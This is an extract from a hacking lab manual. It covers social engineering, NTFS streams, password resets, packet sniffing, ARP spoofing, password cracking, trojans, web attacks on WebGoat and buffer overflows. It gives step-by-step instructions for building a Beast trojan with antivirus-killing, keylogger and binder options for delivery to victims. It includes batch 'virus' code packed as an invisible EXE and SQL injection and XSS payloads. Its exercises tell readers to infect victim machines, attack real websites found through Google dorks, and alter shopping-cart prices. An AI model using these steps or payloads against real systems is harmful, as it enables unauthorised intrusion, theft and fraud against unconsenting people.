a hacker‘s clever manipulation of the natural human tendency to trust.The hacker‘s goal is to obtain
information that will allow him/her to gain unauthorized access to a valued system and the
information that resides on that system.
Social Engineering Categories:
• Human based social engineering
– Telephonic
– Persuasion
– Dumpster diving
– Shoulder surfing
• Technology based social engineering
– Phishing
– Misleading programs
– Spoofed mails/Spam
Human Based Social Engineering
Social engineering on human level is generally exploited on basis of trust and face to face
interaction.Social engineering at psychological level can take place at multiple levels:
Gaining sympathy
Playing games (I am ok You are ok)
Manipulating thoughts
Giving an impression
St. Angelo‘s Professional Education Lab Manual v1.0
41
Calculated inducement of feelings over time
Exploiting factors like above to reach an objective.
Using Technology for Social Engineering
Hackers use a variety of techniques to social engineer using technology
Masquerading as a customer in a support chat for assistance
Sending fake e-mails containing bogus product queries
Sending links to fake websites
Phishing common websites of interest
Creating fake blogs with misleading news/information
Creating fake profiles in social networking sites like orkut.
Cheating people by pretending to be helpless girl on chat and asking for money (cyber-
begging).
Pretend to be a customer support engineer.
Social Engineering by Phone
The most prevalent type of social engineering attack is conducted by phone.
Help desks are particularly prone to this type of attack.
Hackers are able to pretend they are calling from inside the corporation by playing tricks on
the PBX or the company operator.
Help desks are particularly vulnerable because they are in place specifically to help.
Dumpster Diving
Dumpster diving, also known as trashing, is another popular method of social engineering.
A huge amount of information can be collected through company dumpsters.
The information can be company phone books, organizational charts, company policy
manuals, events and vacations, system manuals, printouts of sensitive data or login names
and passwords, printouts of source code, disks and tapes, company letterhead and outdated
hardware.
St. Angelo‘s Professional Education Lab Manual v1.0
42
Module Five: Taking on the system
Module Five: Taking on the system
NTFS Alternate Streams:
Objectives: At the end of this module you should be able
To create and read alternate data stream.
To hide different files using the ADS technique.
Description:
NTFS stream or Alternate Data Stream is a feature only available in the NT File system. Using this
feature any file of desired length can be hidden under another file, such that the true properties of
hidden file are never shown to the user.
Unlike the Hide attribute available form the properties tab of a file, the ADS can be used to completely
hide the file from the file system.
Streams are not limited in size and there can be more than one stream linked to a file.
Creating a NTFS stream:
To retrieve the hidden file contents:
Hidden.txt file is not visible
St. Angelo‘s Professional Education Lab Manual v1.0
43
The alternate data streams can further be used in creating malware which may use a simple bash
script as this which automatically create a ADS file.
Physical Access Attacks:
Objectives: At the end of this module you should be able
Reset Windows Passwords.
Reset Linux Passwords.
Reset Linux Passwords:
Description:
A Linux machine can be made to boot as root user if we can modify the Boot loader at the start of the
machine.Linux may use either LILO or GRUB boot loaders to boot the operating system.
Either of the boot loaders will allow us to modify the boot options where we can modify to boot into
single user mode.
Booting into Linux single user mode:
At the boot loader instead of selecting the OS to boot type letter ‗e‘ to edit the line before boot.
Ubuntu by default give you an option to boot into the recovery mode where a root shell can be
dropped into.
The boot loader will then present you with a screen to edit the kernel boot options, where these
changes are to be made.
@ECHO OFF REM This batch file starts or opens a REM stream. Call with first param as filename REM and second param as stream name MKLINKtemp_%2%1:%2 STARTtemp_%2 DELtemp_%2
St. Angelo‘s Professional Education Lab Manual v1.0
44
Find the line which starts with the word Linux and append to it the word ―single‖.
(OR)
Append the line init=/bin/bash.
Once the changes are done type ‗b‘ in some cases (or) CTRL + X keys to boot with changes.
Reset Windows Passwords:
Windows stores local usernames in the Security Accounts Manager (SAM) database as well as in other
places. Please read the following article if you are not familiar with the SAM:
http://www.microsoft.com/technet/archive/winntas/tips/winntmag/storpass.mspx?mfr=true
The SAM file can be found in %SYSTEMROOT%\system32\configand is inaccessible for reading,
copying, or writing while Windows is running.The solution is to reboot the system with a live os which
makes the file system readable.
In this example we will be looking at a tool called chntpwwhich is used to modify the contents of SAM
file.
Using chntpw
Instructions for using chntpw:
Boot a live OS like backtrack into windows machine.
Mount the file system which contains the operating system installed.
Give the path of SAM file to chntpw
The tools will prompt for changing the password file or blanking the password.
Choose your desired option and the tool will save accordingly.
Reboot the machine into windows, you should be able to login without any difficulties.
This screenshot shows modifying of a sample SAM and system file.
St. Angelo‘s Professional Education Lab Manual v1.0
45
St. Angelo‘s Professional Education Lab Manual v1.0
46
TCPDUMP (Network Analyzers)
Objectives: At the end of this module you should be able
To intercept data from networks and monitor it
To filter necessary packets.
Description:
Network analyzers are used to monitor packet data in a network for the purpose of troubleshooting
network related problems. However, in the field of security these tools and techniques have greater
importance as they can be used to compromise the security of network and systems.
St. Angelo‘s Professional Education Lab Manual v1.0
47
Basic Usage
Based on the kind of traffic we are looking for, we can use a different combination of options to
tcpdump, as can be seen below:
1. Basic communication // see the basics without many options
# tcpdump -nS
2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help
# tcpdump -nnvvS
3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet
# tcpdump -nnvvXS
4. Heavy packet viewing // the final "s" increases the snap length, grabbing the whole packet
# tcpdump -nnvvXSs 1514
Here's a capture of exactly two (-c2) ICMP packets (a ping and pong) using some of the options
described above. Notice how much we see about each packet.
Common Syntax
Expressions allow you to trim out various types of traffic and find exactly what you're looking for.
Mastering the expressions and learning to combine them creatively is what makes one truly powerful
with tcpdump.
root # tcpdump -nnvXSs 0 -c2 icmp tcpdump: listening on eth0, link-type EN10MB (Ethernet), 23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0 0x0000: 4520 0054 882b 0000 3001 7cf5 45fe d52b E..T.+..0.|.E..+ 0x0010: 4815 222a 0800 3530 272a 0000 25ff d744 H."*..50'*..%..D 0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 .^.............. 0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............!"# 0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $%&'()*+,-./0123 0x0050: 3435 3637 4567 23:11:10.370344 IP (tos 0x20, ttl 64, id 35612, offset 0, flags [none], length: 84) 72.21.34.42 > 69.254.213.43: icmp 64: echo reply seq 0 0x0000: 4520 0054 8b1c 0000 4001 6a04 4815 222a [email protected]."* 0x0010: 45fe d52b 0000 3d30 272a 0000 25ff d744 E..+..=0'*..%..D 0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 .^.............. 0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............!"# 0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $%&'()*+,-./0123 0x0050: 3435 3637 4567 2 packets captured 2 packets received by filter 0 packets dropped by kernel root #
St. Angelo‘s Professional Education Lab Manual v1.0
48
There are three main types of expression: type, dir, and proto.
Type options are host, net, and port. Direction is indicated by dir, and there you can have src, dst, src
or dst, and src and dst.Here are a few that you should definitely be comfortable with:
host // look for traffic based on IP address (also works with hostname if you're not using-n)
# tcpdump host 1.2.3.4
src, dst // find traffic from only a source or destination (eliminates one side of a
hostconversation)
# tcpdumpsrc 2.3.4.5
# tcpdumpdst 3.4.5.6
net // capture an entire network using CIDR notation
# tcpdump net 1.2.3.0/24
proto // works for tcp, udp, and icmp. Note that you don't have to type proto
# tcpdumpicmp
port // see only traffic to or from a certain port
# tcpdump port 3389
src, dst port // filter based on the source or destination port
# tcpdumpsrc port 1025
# tcpdumpdst port 389
src/dst, port, protocol // combine all three
# tcpdumpsrc port 1025 and tcp
# tcpdumpudp and src port 53
You also have the option to filter by a range of ports instead of declaring them individually, and to
only see packets that are above or below a certain size.
Port Ranges // see traffic to any port in a range
#tcpdumpportrange 21-23
Packet Size Filter // only see packets below or above a certain size (in bytes)
#tcpdump less 32
#tcpdump greater 128
[ You can use the symbols for less than, greater than, and less than or equal / greater than or equal
signs as well. ]
// filtering for size using symbols
#tcpdump> 32
#tcpdump<= 128
Writing to a File
Tcpdump allows you to send what you're capturing to a file for later use using the –w option, and
then to read it back using the -r option. This is an excellent way to capture raw traffic and then run it
through various tools later.
Capture all Port 80 Traffic to a File
# tcpdump -s 1514 port 80 -w capture_file
St. Angelo‘s Professional Education Lab Manual v1.0
49
Then, at some point in the future, you can then read the traffic back in like so:
Read Captured Traffic back into tcpdump
# tcpdump -r capture_file
Wireshark
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,
software and communications protocol development, and education.
Steps to Use the program:
Capturing the Packets can be initiated by selecting the appropriate Interface from the
interface list as visible in the above picture.
Packets will be captured as soon as the interface is selected the next Image will show how the
packets are shown to us.
Packet information can be viewed by double clicking on a specific packet.
Wireshark offers a great deal of filters which help sort out the necessary packets to be viewed.
To apply filters type the filter located below the menu bar. Pre-Built expressions can also be
used. They can be accessed by clicking on Expressions beside Filter Box.
St. Angelo‘s Professional Education Lab Manual v1.0
50
As we can see above there are many number of packets in this window. These can be recognized
by looking at the protocol column to know whether it is a HTTP, TCP-RAW DNS or any other packet.
Wireshark makes it easy by color coding each protocol. The one in blue is a DNS packet and the green
one is a TCP or TCP-HTTP packet.
Since there are thousands of packets that are being intercepted at a second, it is a tedious job to
locate a particular packet among them. This is where the filter feature comes in handy.
Wireshark comes with lot of built-in filters and also gives us the freedom to make our own filters.
For Example if we want to look at packets coming from a specific domain the filter would be
Filter: ip.src==10.42.43.38
< More Examples >
Filter: ip.src == 10.42.43.38 &&ip.dst == 10.42.43.1(Show Packets from SRC IP to DSTN IP)
Filter: HTTP (Show only HTTP packets)
Filter: TCP || HTTP (show TCP or HTTP packets or BOTH)
Apart from looking at the protocol information, the best feature of wireshark is that we can re-create
or see source of the entire webpage, binary or any other file that is being transmitted through the
network.
St. Angelo‘s Professional Education Lab Manual v1.0
51
Following a Packet Sequence:
Click on the Follow TCP Stream as shown above to look for sequential packet information.
The follow Tcp stream selection will land you in a window as shown below. This particular window will
show the combined output of all the packets selected by a particular filter or by default it takes IP as
filter and shows all data associated with it.
The information showed in red is the data received and the one in blue is information that is being
sent to the server.
So by sniffing the networks any un-encrypted information can now be intercepted and seen by the
above process. By using specific filters and combining the data gathered from the above windows we
can re-create the packet structure to make a binary file.
St. Angelo‘s Professional Education Lab Manual v1.0
52
Exercises:
• Try to capture only the packets of only HTTP protocol using tcpdump/wireshark
• Capture the packets containing Login credentials of a website.
• Try to capture packets from a chat messenger/irc chat.
Arp Spoofing (Ettercap)
Objectives: At the end of this module you should be able
To attack ARP protocol and capture all outgoing and incoming packets for a system.
To be comfortable using Ettercap tool.
Description:
Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live
connections, content filtering on the fly and many other interesting tricks. It supports active
and passive dissection of many protocols and includes many features for network and host
analysis.
In order to poison an Arp cache, the Ettercap will first scan (Hosts->Scan for hosts) the entire
netmask and then clicking on Hosts->Hosts will provide the list of active members in the
network
• On the (Targets->Show Targets) screen Ettercap will show you the list of hosts, targets has to
be selected by selecting the IP and clicking on add to Target.
• The attack can be started by clicking MITM->Arp poisoning as show below.
• Click on Sniff remote connections when prompted to sniff packets from the victim machine.
• Once the Arp cache is poisoned the packets captured can be viewed on any packet sniffer
such as Wireshark.
St. Angelo‘s Professional Education Lab Manual v1.0
53
Arp Poisoning
Exercises:
• Perform an ARP attack on a local switch; this attack can result in total collapse of the
network. (You have been warned!!)
St. Angelo‘s Professional Education Lab Manual v1.0
54
Module Six: Attacking passwords
St. Angelo‘s Professional Education Lab Manual v1.0
55
Module Six: Attacking passwords
PASSWORD HACKING:
Objectives: At the end of this module you should be able
To crack passwords using any of the three techniques, dictionary brute-force, and
hybrid attacks.
To crack MD5, NTLM passwords.
Description:
Password-based authentication is one of the weakest forms of user verification, the main reason being
that most times, the choice of the password is left to the user (which, as you know, is the weakest part
of the security chain).
Even if passwords are not user created—if, for instance, they are generated randomly—the security of
the password is still left to the user. It's surprisingly common for users to writer their password on a
sticky note and keep it under their keyboard. Unfortunately, it seems like corporate policies are not
capable of enforcing password security to a satisfying level.
HYDRA: Brute Force tool
As described by its authors, Hydra is the best-parallelized login hacker for Samba, FTP, POP3, IMAP,
Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco, and more. Hydra includes
SSL support and is part of Nessus. Hydra supports a huge number of protocols and is probably the
most well-known password brute force tool.
Type hydra in a BackTrack console to see the many Hydra command line options
St. Angelo‘s Professional Education Lab Manual v1.0
56
FTP brute forcing with hydra:
The above picture shows a success full http password cracking where
username = admin & password = P@ssword1
Open console and type in hydra use the ―-l ‖to mention the user name if you are sure.
Use the ―-P‖ option to mention the word list or password list.
Finally mention the target ip using ―-V‖ and after that the protocol on which to attack.
-e ns does Additional checks, ―n‖ for null password, ―s‖ try login as pass
-t TASKS run TASKS no. of connects in parallel.
-f exit after the first found login/password pair.
-s PORT if the service is on a different default port, define it here.
-v/-V verbose mode/ show login+password for each attempt.
Using Lophtcarck to crack the hashes:
L0phtCrack is password audit and recovery tool for Windows and Unix passwords.
L0phtCrack 6 provides two critical capabilities to system administrators:
● L0phtCrack 6 helps administrators secure Windows and Unix-authenticated networks through
comprehensive auditing of Windows NT/2000/XP/2003/Vista/2008 and Unix user account
passwords.
● L0phtCrack 6 recovers Windows and Unix user account passwords to streamline migration of
users to another authentication system or to access accounts whose passwords are lost.
St. Angelo‘s Professional Education Lab Manual v1.0
57
Importing hash to Lophtcrack :
Step 1: click on import hash then select import from pwdump file.
Step 2: Select your hash file and click ok.
Step 3: Click on Begin.
St. Angelo‘s Professional Education Lab Manual v1.0
58
As you can see lophtcrack has cracked the hashes for us .
Exercises:
i. Crack the windows passwords by copying SAM and system file onto temporary file
and use ―cain and abel‖ to crack passwords.
ii. Learn to use johntheripper password cracking tool.
iii. Crack the the hash ―28d2464b121f120a41f4cd5c496cae2c‖ (Use all the three types of
password cracking and document the cracking procedure.)
Module Seven: Malwares, Rootkits and Trojans
Objectives:
● To build a trojan using a trojankit(Beast 2.07).
● To create a batch file virus.
Tools
St. Angelo‘s Professional Education Lab Manual v1.0
59
● Beast(v2.07): This is a trojan building kit which is used to create trojans using a GUI.
● Notepad
● BAT to EXE converter
Beast
This is a powerful trojan building tool. It can be obtained
fromhttps://sites.google.com/site/trojandownloads/beast-2-07. However this link was only functional
at the time of writing, and you may need to look for another link.
Note:Your Anti-Virus program may pick this up as a severe threat, as the trojan kit itself was
released a couple of years back. To successfully perform this demo, you might have to disable your
AV‘s protection mechanism.
Trojan
A trojan is a form of malware which acts as a ‗remote administration tool‘. Upon execution, the
server can establish a link with the client(victim). Although this demonstration is carried out using
Beast, in a real world scenario, other trojan kits might be more effective. The attacker must once again
keep in mind that the concept behind the attack is what matters and should perhaps look to create
his/her own trojan kit.
Building a Trojan using Beast
● Launch the Beast GUI.
● Click on Build Server. This is the settings page of the file which will be executed on the
victim‘s machine.
● In the Basic tab, specify the network settings for the file. The file will be referred to as
‗server.exe‘. Here you can also specify the program in which the trojan is to be injected. You
can also create a Password which will be required to connect to ‗server.exe‘ when it is
executed on the victim‘s computer.
St. Angelo‘s Professional Education Lab Manual v1.0
60
● The Notifications tab provides options for ‗server.exe‘ to inform the attacker about its current
status. The media of communication could be Email, ICQ, etc.
● The Startup tab is self-explanatory and provides configuration options for the startup event
of ‗server.exe‘
● The AV-FW Kill page provides settings for the disabling of Anti-virus software and Firewall. It
provides options for specific firewalls/AVs. Apart from this, there are also options for the
St. Angelo‘s Professional Education Lab Manual v1.0
61
periodic killing of AVs/firewalls and the disabling of Windows XP firewall.
● Click on Misc. Most of the functions are self-explanatory. However of particular note are:
○ Melt server on Install-This deletes ‗server.exe‘. However the trojan is injected into
various other files and programs, ensuring its proper functioning.
○ Enable keylogger-The keylogger logs all keystrokes and user activity. It can be used to
monitor all user activity.
○ Delay execution-This is used to delay execution of the trojan, so as to avoid the
suspicion of the user.
St. Angelo‘s Professional Education Lab Manual v1.0
62
● Click on Exe Icon to specify the icon of ‗server.exe‘.
● You should now see ‗server.exe‘ in the directory where you have installed Beast. Go back to
the main window of Beast and click on Binder, to bind ‗server.exe‘ with another inconspicuous
file, such as a game, greeting, etc. This is where the attacker‘s socialengineering skills come
into play.
● The final file should be renamed accordingly and sent to the victim‘s computer. Once again,
this will require social engineering on the part of the attacker.
Connecting to the victim’s computer
● Launch Beast. Specify the connection parameters and click on Connect to connect to the
victim‘s machine.
St. Angelo‘s Professional Education Lab Manual v1.0
63
● Once you specify the connection parameters
● Click on Managers. Here you can explore the Registry, File system, applications running and
active processes.
St. Angelo‘s Professional Education Lab Manual v1.0
64
The features available are same as that you would have when you operate your own
computer.
● Click on Windows and you can choose to Shut Down, Restart, Log Off, Crash the system, etc.
● Click on Lamer Stuff. All the options are self explanatory and are mostly used to create a
nuisance for the victim.
● Click on Fun Stuff. Once again, the options are self explanatory. Chat is used to pop up a chat
window on the victim‘s computer for real time conversation between the attacker and victim.
St. Angelo‘s Professional Education Lab Manual v1.0
65
● Click on Server. Click on Update Server, here you can update the server remotely. Apart from
this, you can also kill the server.
● Click on Misc. Here you can change the System Time, send messages to the victim‘s desktop,
get log of the key logger, etc.
St. Angelo‘s Professional Education Lab Manual v1.0
66
● Following is a sample of the decrypted log given by the logger:
************ Boot:[09/03/2013]-[16:56:32]
[Beast2.07]-[16:56:32]
[Beast 2.07]-[16:56:33]
r
[Run]-[16:56:44]
abcdedffaasdsadarun
[Program Manager]-[16:56:50]
[Beast 2.07]-[16:56:51]
[Information]-[16:56:53]
asdasfaf
[Decrypt Log File]-[16:57:02]
************ Boot:[09/03/2013]-[17:27:02]
[Beast2.07]-[17:27:02]
[Program Manager]-[17:27:03]
[Beast 2.07]-[17:27:04]
[Run]-[17:27:23]
[Program Manager]-[17:27:54]
[Paint]-[17:27:54]
[Untitled - Paint]-[17:27:54]
vs
[Save As]-[17:27:56]
7
[Untitled - Paint]-[17:27:59]
[7.png - Paint]-[17:27:59]
[Beast 2.07]-[17:28:03]
r
[Run]-[17:28:09]
[Program Manager]-[17:28:09]
[Paint]-[17:28:09]
St. Angelo‘s Professional Education Lab Manual v1.0
67
[Untitled - Paint]-[17:28:09]
vs
[Save As]-[17:28:11]
8
[Untitled - Paint]-[17:28:14]
[8.png - Paint]-[17:28:14]
[Settings]-[17:28:19]
[Beast 2.07]-[17:28:24]
Batch File Viruses
Viruses are malwares which can replicate themselves and spread from one computer to the other.
It is a common misconception that Viruses also include Trojans, botnets, adware, etc., this is
untrue and this is infact the definition of malwares. One should note that every virus will be a
malware, however the converse need not always be true.
We will now try to create a simple Batch file virus of our own. These viruses will generally not be
detectable by AVs as they are supposed to be simple code. However, they can be read easily by the
user. To avoid this, you can download a ‗BAT to EXE‘ converter online. The one being used in this
tutorial is available athttp://www.battoexeconverter.com/. Any other converter will also do.
Note: While playing with batch virus, you might cause irreversible damage to your machine, to
the extent that you might have to format your system. Hence, it is best to carry this out on a virtual
machine.
Note:While these viruses might seem as only potential nuisance makers. They can be written
effectively so as to bring down an entire machine.
● Open Notepad.
● Write the following code:
1 @echo off
2 :x
3 start notepad
4 start explorer
5 start control
6 goto x
Line 1 prevents the commands from being displayed on the screen. Line 2 is a label. We
will come to its use in just a moment. Lines 3-5 are used to launch Notepad, Explorer and
Control Panel. Line 6 makes the program go back to Line 2(with the help of the infamous goto
statement and label ‗x‘), causing repeated execution of Lines 3-5. Thus, a large number of
Notepad, Explorer and Control Panel Windows are launched. This might cause the system to
crash.
● Save the file as ‗batchvirus.bat‘
St. Angelo‘s Professional Education Lab Manual v1.0
68
● Now to convert it to an EXE file, open ‗Advanced BAT to EXE converter‘.
● Click on Open and select the BAT file we just created.
St. Angelo‘s Professional Education Lab Manual v1.0
69
● Click on Build EXE and select Start Invisible.
● Select the file path to save the EXE to.
● Sure enough, we have our own batch file Virus.
There can be a number of ways to develop batch viruses. It is only bounded by your creativity.
However, it might be a challenge to use batch viruses to actually infect other files.
St. Angelo‘s Professional Education Lab Manual v1.0
70
theHarvester.py
theHarvester.py is an information gathering tool used to list email addresses and other info from the public domain. It is a part of the distribution for BackTrack. This particular demonstration makes use of BackTrack5. In order to perform this demonstration, follow the following steps:
● Launch BackTrack5. Go to /pentest/enumeration/theharvester. This is where
theHarvester.py is located.
● Launch terminal. Type in the following:
root@bt:~# cd /pentest/enumeration/theharvester ● Now that we are inside the directory, we need to launch the script. To do so, type in the
following:
root@bt:~# ./theHarvester.py
● We will now try to use this tool to gain information about harvard.edu
● The next command to be entered is:
Here ‘-d’ is used to specify the domain name to search for and ‘-b’ is used to specify the
data source to use (Google, Bing, etc.)
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d
harvard.edu -b google
St. Angelo‘s Professional Education Lab Manual v1.0
71
● The command rightly lists all the email addresses it can find. Upon scrolling down, we can
also find the various hosts found.
St. Angelo‘s Professional Education Lab Manual v1.0
72
The information obtained using theHarvester.py is of vital importance from a social engineering perspective. Gaining email addresses can help us pinpoint people with efficiency. This can of course be of huge help when employing social engineering tactics.
Exercises
1. Using a Trojan building kit, other than Beast, build a Trojan and successfully infect a
victim machine.
2. Without the use of any Trojan building kit, using only programming skills, try to create a
program which can act as a RAT. It need not pack all the features demonstrated, but
should be able to carry out basic functions.
3. Read more about batch file programming and use it to build a batch file virus which can
permanently crash the machine.
4. Using theHarvester.py, find out the email addresses associated with a random server
and use them to pinpoint a particular person.
St. Angelo‘s Professional Education Lab Manual v1.0
73
Module Eight: Getting Offensive
Common Web Application Attacks
Objective
● To carry out common web application attacks, including SQL injection, XSS and Basic Access
Flaws.
● To use google dorks for information gathering.
Tools
● WebGoat-This is a controlled environment used for practising and learning about web
application attacks. The purpose of WebGoat is to provide hands-on-experience in carrying
out attacks.
● TamperData-Firefox plugin used to intercept HTTP requests.
● Live HTTP Headers-Firefox plugin used to read HTTP headers.
Netcraft
http://news.netcraft.com/ is a service which can be used to gather information about websites.
The IP Adress, OS running on the server, hosting country, risk rating, etc. are often quite useful in
narrowing down on the type of attacks to be carried out on the given site during a PenTest.
A typical site report looks as follows.
St. Angelo‘s Professional Education Lab Manual v1.0
74
Configuring WebGoat
WebGoat is available for download fromhttp://code.google.com/p/webgoat/downloads/list. The
download consists of information on setting up the application(README.txt). As it contains a bundle
including Apache Tomcat, JRE and the application itself, it is self sufficient. If you get to the following
St. Angelo‘s Professional Education Lab Manual v1.0
75
screen successfully, it means that you are running WebGoat successfully.
Note: While using WebGoat, disconnect from the network as the application makes the network
also vulnerable to attacks
SQL Injection
SQL Injection is an attack which looks to manipulate the SQL command sent to the server so as to
get data from the database, generally by virtue of the input given by the attacker.
SQL Injection on WebGoat
● Go to Injection Flaws > Stage 1: String SQL Injection
St. Angelo‘s Professional Education Lab Manual v1.0
76
● In the password field, try to put in a random username. For eg. ‗Sam‘
As expected, we are unable to log into the system.
Note: A real website will definitely not have its SQL commands up for display. So try and
work without it.
Whatever input the attacker gives is delimited by quotes in almost all cases. The idea here is to
manipulate this syntax, so as to gain user access without having valid credentials.
Before doing this, install the TamperData add-on for Firefox.
Using Tamperdata
After installing,
● In your Firefox window, go to Tools>TamperData.
● Go to the TamperData window and click on Start Tamper.
● Put in any random password, eg.‖Pass123‖ in the password field. Click on the Login button.
TamperData should show the following screen.
St. Angelo‘s Professional Education Lab Manual v1.0
77
● Click on Tamper. This allows you to intercept the POST request and change the password
value that is sent to the server.
St. Angelo‘s Professional Education Lab Manual v1.0
78
● The string ‗ or 1=1-- modifies the (probable) SQL command as follows:
select * from users where user=‘Larry‘ and pass=‘xyz‘;
To
select * from users where user=‘Larry‘ and pass=‘‘or 1=1--‘;
The 2nd statement passes a condition (1==1) which will always be true, which returns all the users
in the database and by default logs in the 1st user in the table.
St. Angelo‘s Professional Education Lab Manual v1.0
79
● The above page shows us that we have successfully carried out the attack, giving us access to
the user‘s account.
Havij
St. Angelo‘s Professional Education Lab Manual v1.0
80
Havij is an automated SQL injection tool for pen testers. This can be used to greatly simplify the
process.
St. Angelo‘s Professional Education Lab Manual v1.0
81
It also allows direct access to the database. All the tables are listed out with complete access.
The target URL should be the address of the page along with a marker(%inject_here%) after the
parameter which is to be used form manipulation.
Handy Tricks
● SQL syntax may vary from web application to web application. Hence try different
combinations to gain access
● Do NOT remember ‗ or 1=1-- as a keyword. Understand the functioning to exploit the
mechanism.
St. Angelo‘s Professional Education Lab Manual v1.0
82
● At times input validation on the front end might not allow you to enter special characters. At
such times it is best to use TamperData or Burp to intercept the HTTP requests.
● Although tools such as Havij can be used to easily compromise security. However, one should
be careful not to use it as a skiddies tool.
Cross Site Scripting
Stored XSS
The injection/storage of a malicious script in a web application such that it is executed by the
client‘s browser is called a XSS attack. Following is an example of a Stored XSS attack using WebGoat.
● Launch WebGoat and go to Cross Site Scripting(XSS)>Stored XSS Attacks
● Put in a random title and in the Message field, enter the script to be executed. Although the
script used here is pretty straightforward, one can replace it with a malicious script.
● Click on Submit to save the message to the Message List.
● The newly stored message should appear on the Message List.
St. Angelo‘s Professional Education Lab Manual v1.0
83
● Clicking on it should yield the following result.
The appearance of the alert confirms the successful execution of the script and the attack.
Reflected XSS
In this attack, the attacker usually creates a URL which contains the attack script and mails it or
uses other media to allow the user to access it, thereby compromising the user‘s security.
● Launch WebGoat, go to Cross Site Scripting>Reflected XSS
● We have to look to exploit the access code field.
● In the access code field, after the three digit code, put in the following code:
<script>alert(‗Reflected XSS‘)</script>
St. Angelo‘s Professional Education Lab Manual v1.0
84
● Click on Purchase. This should result in the showing of the alert.
● Hence, we have successfully executed the Reflected XSS attack.
Handy Tricks
● When working on live websites look to check fields such as search fields for Reflected XSS.
● Many forums and message boards are still vulnerable to Stored XSS.
● Use Google Dorks to look for the message board list in specific websites.
Basic Authentication Flaws
Often Web Applications have improper mechanisms in place to retrieve forgotten
passwords/process them. The attacker looks to exploit this vulnerability in order to gain access.
Forgot Password
This vulnerability is present when the security question protecting the password is not as strong as
the password itself.
● Launch WebGoat. Go to Authentication Flaws>Forgot Password.
● Enter the username as ‗webgoat‘ in the username field.
● The security answer should be pretty obvious. Try a couple of colours, such as
‗blue‘,‘green‘,etc.
● Finally, ‗red‘ will get us through.
St. Angelo‘s Professional Education Lab Manual v1.0
85
Note: Although this vulnerability involves more of social engineering, than actual
exploitation of a flaw in the system, it is still effective and can still be used to bypass the
authentication of major mailing sites.
Basic Authentication Flaw
Basic Access Authentication is used by the web browser to provide the username/password when
making a request to the server. This information is encoded and sent to the server. When the server
sends the encoded form back to the browser, the HTTP header is read and the encoded value is
decoded to get the user credentials.
● Launch WebGoat, go to Authentication Flaws>Basic Authentication.
● Open the Live HTTP Headers(ensure that the Capture field is marked) and refresh the Basic
Authentication page.
● The highlighted entry is the authentication header along with the encoded value of user
credentials.
● Copy only ‗Authorization‘ to the WebGoat Authentication Header Name field.
● Now we need to decode the base64 encoded value so as to get the username/password out
of it.
St. Angelo‘s Professional Education Lab Manual v1.0
86
● Go tohttp://yehg.net/encoding/index.php and paste the base64 encoded string in the textbox
given.
● Click on ‗Convert me!‘ to get the decoded value.
● There is the required username/password. Copy this string to the 2nd textbox on the
WebGoat Basic Authentication Flaw page.
● Click on Submit. You will now get a page saying that the vulnerability has been exploited
successfully.
● Now we will try to login using the ‗basic:basic‘ credentials, given on the Congratulatory page.
● Clear your browser‘s Cookies and Active Login sessions.
● In the URL field, put in the following URL:
St. Angelo‘s Professional Education Lab Manual v1.0
87
http://basic:basic@localhost:8080/WebGoat/attack?Screen=187&menu=500&Restart=18
7
● Click on Submit, we should now see the following dialog box.
● Upon clicking on ‗OK‘ you will be logged in successfully into the website.
● Hence we have successfully exploited the Basic Access Authentication Flaw.
Google Dorks
Google dorks are advanced searching techniques using Google. They are used to narrow down on
specific content on the web or even in a particular website. For Ex. While checking for SQL Injection on
a website, one will of course want to look at the login page. However searching for this particular
page manually will take some effort and may also turn out to be cumbersome. Hence, one can employ
Google Dorks to search for the probable login pages in the site.
Typical Google Dork syntax:
dork1:parameter1 dork2:parameter2 query.
Common Google Dorks
● cache: This is used to search cached pages for the given search query.
● link:It returns all the pages containing a link to the given parameter. For eg.
link:www.nsd.org.in will return all the pages containing links to the given URL.
● related:This is used to display pages similar to the one specified
● info:It will return whatever information google has about the given site. There should be no
space between the dork and the parameter.
● inurl:This will return all the pages containing the query word immediately after the dork in the
URL of the page. For eg. [inurl:nsdisac] will return all the pages which contain ‗nsd‘ in the URL
and ‗isac‘ anywhere in the document.
● allinurl:This will return all the pages containing all the query words after the dork in the URL
of the page. For eg. [inurl:nsdisac] will return all the pages which contain both ‗nsd‘ and ‗isac‘
in the URL.
● intitle:This will return all the pages containing the query word immediately after the dork in
the title of the page. For eg. [inurl:nsdisac] will return all the pages which contain ‗nsd‘ in the
title and ‗isac‘ anywhere in the document.
● allintitle:This will return all the pages containing all the query words after the dork in the title
of the page. For eg. [inurl:nsdisac] will return all the pages which contain both ‗nsd‘ and ‗isac‘
in the URL.
● site:This is used to restrict the results to a given domain.
Google Dorks can be combined to specifically look for results. For eg. The following search query
can be used to search for the login page in a particular website, so that it can be checked for SQL
Injection.
inurl:login site:silverzone.org
St. Angelo‘s Professional Education Lab Manual v1.0
88
Exercises
i. Using Google Dorks, search for a website which contains a login page and try to execute SQL
Injection on it.
ii. Read about Shopping Cart Attack and try to carry it out on a ecommerce website using
TamperData/Burp Suite.
a. Hint: Shopping Cart Attack involves interception of HTTP requests(demonstrated in
the SQL Injection part) so as to change the value of the bill and avail items at a lower
price.
iii. Complete the XSS challenge in WebGoat.
Module Nine: Exploiting
Buffer Overflows:
Objectives: At the end of this module you should be able
To be able to perform buffer overflows in a program.
To understand and exploit programs.
To understand and use debuggers effectively.
To attack and get control of a system.
Description:
Buffer overflows are a special type of technique where we bombard the program with large
amounts of random data, which causes the program to fail at a certain point.
We place in a debugger to catch the exception points, errors, and overflowing areas, and
critical areas like EIP being overwritten.
For this example we will be using WarFtpd1.6 FTP server on windows XP.
WarFTPd:
St. Angelo‘s Professional Education Lab Manual v1.0
89
i. Notice the little lightening icon up there?
ii. Click that to start the ftp server.(Remember ftp server listens at port 21)
